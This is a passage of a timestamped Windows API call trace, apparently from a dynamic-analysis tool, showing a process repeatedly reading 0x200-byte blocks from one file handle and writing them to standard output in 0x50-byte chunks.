lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.311] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.311] GetFileType (hFile=0x4c) returned 0x1 [0096.312] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.312] GetFileType (hFile=0x4c) returned 0x1 [0096.312] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.312] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.312] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.312] GetFileType (hFile=0x4c) returned 0x1 [0096.312] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.312] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.312] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.312] GetFileType (hFile=0x4c) returned 0x1 [0096.312] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.312] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.312] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.312] GetFileType (hFile=0x4c) returned 0x1 [0096.312] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.312] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.312] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.312] GetFileType (hFile=0x4c) returned 0x1 [0096.312] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.312] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.312] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.312] GetFileType (hFile=0x4c) returned 0x1 [0096.312] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.312] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.312] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.312] GetFileType (hFile=0x4c) returned 0x1 [0096.312] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.312] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.312] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.312] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.312] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.312] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.312] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.313] GetFileType (hFile=0x4c) returned 0x1 [0096.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.313] GetFileType (hFile=0x4c) returned 0x1 [0096.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.313] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.313] GetFileType 
(hFile=0x4c) returned 0x1 [0096.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.313] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.313] GetFileType (hFile=0x4c) returned 0x1 [0096.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.313] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.313] GetFileType (hFile=0x4c) returned 0x1 [0096.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.313] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.313] GetFileType (hFile=0x4c) returned 0x1 [0096.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.313] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.313] GetFileType (hFile=0x4c) returned 0x1 [0096.313] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.314] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.314] GetFileType (hFile=0x4c) returned 0x1 [0096.314] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0096.314] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.314] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.314] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.314] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.314] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.314] GetFileType (hFile=0x4c) returned 0x1 [0096.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.314] GetFileType (hFile=0x4c) returned 0x1 [0096.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.314] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.314] GetFileType (hFile=0x4c) returned 0x1 [0096.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.314] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.314] GetFileType (hFile=0x4c) returned 0x1 [0096.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.314] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, 
lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.314] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.315] GetFileType (hFile=0x4c) returned 0x1 [0096.315] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.315] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.315] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.315] GetFileType (hFile=0x4c) returned 0x1 [0096.315] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.315] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.315] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.315] GetFileType (hFile=0x4c) returned 0x1 [0096.315] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.315] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.315] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.315] GetFileType (hFile=0x4c) returned 0x1 [0096.315] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.315] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.315] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.315] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.315] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.315] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.315] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.315] GetFileType (hFile=0x4c) returned 0x1 [0096.315] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.315] GetFileType (hFile=0x4c) returned 0x1 [0096.315] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.315] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.316] GetFileType (hFile=0x4c) returned 0x1 [0096.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.316] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.316] GetFileType (hFile=0x4c) returned 0x1 [0096.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.316] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.316] GetFileType (hFile=0x4c) returned 0x1 [0096.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.316] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.316] GetFileType (hFile=0x4c) returned 0x1 [0096.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.316] WriteFile (in: 
hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.316] GetFileType (hFile=0x4c) returned 0x1 [0096.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.316] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.316] GetFileType (hFile=0x4c) returned 0x1 [0096.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.316] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.316] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.316] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.316] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.316] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.316] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.316] GetFileType (hFile=0x4c) returned 0x1 [0096.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.317] GetFileType (hFile=0x4c) returned 0x1 [0096.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.317] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.317] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0096.317] GetFileType (hFile=0x4c) returned 0x1 [0096.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.317] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.317] GetFileType (hFile=0x4c) returned 0x1 [0096.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.317] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.317] GetFileType (hFile=0x4c) returned 0x1 [0096.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.317] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.317] GetFileType (hFile=0x4c) returned 0x1 [0096.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.317] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.317] GetFileType (hFile=0x4c) returned 0x1 [0096.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.317] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.317] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0096.317] GetFileType (hFile=0x4c) returned 0x1 [0096.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.317] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.317] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.317] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.317] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.317] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.317] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.317] GetFileType (hFile=0x4c) returned 0x1 [0096.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.318] GetFileType (hFile=0x4c) returned 0x1 [0096.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.318] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.318] GetFileType (hFile=0x4c) returned 0x1 [0096.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.318] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.318] GetFileType (hFile=0x4c) returned 0x1 [0096.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.318] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, 
lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.318] GetFileType (hFile=0x4c) returned 0x1 [0096.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.318] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.318] GetFileType (hFile=0x4c) returned 0x1 [0096.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.318] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.318] GetFileType (hFile=0x4c) returned 0x1 [0096.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.318] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.318] GetFileType (hFile=0x4c) returned 0x1 [0096.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.318] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.318] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.318] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.318] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.318] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.318] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.319] GetFileType (hFile=0x4c) returned 0x1 [0096.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.319] GetFileType (hFile=0x4c) returned 0x1 [0096.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.319] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.319] GetFileType (hFile=0x4c) returned 0x1 [0096.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.319] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.319] GetFileType (hFile=0x4c) returned 0x1 [0096.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.319] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.319] GetFileType (hFile=0x4c) returned 0x1 [0096.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.319] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.319] GetFileType (hFile=0x4c) returned 0x1 [0096.319] _get_osfhandle (_FileHandle=1) returned 
0x4c [0096.319] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.319] GetFileType (hFile=0x4c) returned 0x1 [0096.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.319] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.319] GetFileType (hFile=0x4c) returned 0x1 [0096.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.319] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.319] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.319] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.319] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.319] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.319] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.320] GetFileType (hFile=0x4c) returned 0x1 [0096.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.320] GetFileType (hFile=0x4c) returned 0x1 [0096.320] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.320] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) 
